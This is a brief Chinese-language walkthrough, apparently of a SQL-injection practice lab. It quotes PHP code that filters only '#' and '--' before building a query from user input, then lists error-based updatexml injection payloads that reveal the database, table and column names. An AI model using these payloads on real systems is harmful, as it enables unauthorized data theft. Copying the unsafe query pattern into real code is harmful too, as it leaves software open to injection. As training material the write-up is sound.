一、审查源码
这里我就捡重要的代码挑出来说一下
preg_replace 函数执行一个正则表达式的搜索和替换,将reg里面内容替换为空
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
二、 SQL注入
1、获取数据库
?id=-1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1
2、获取数据表
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '1'='1
3、获取字段
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='users'),0x7e),1) and '1'='1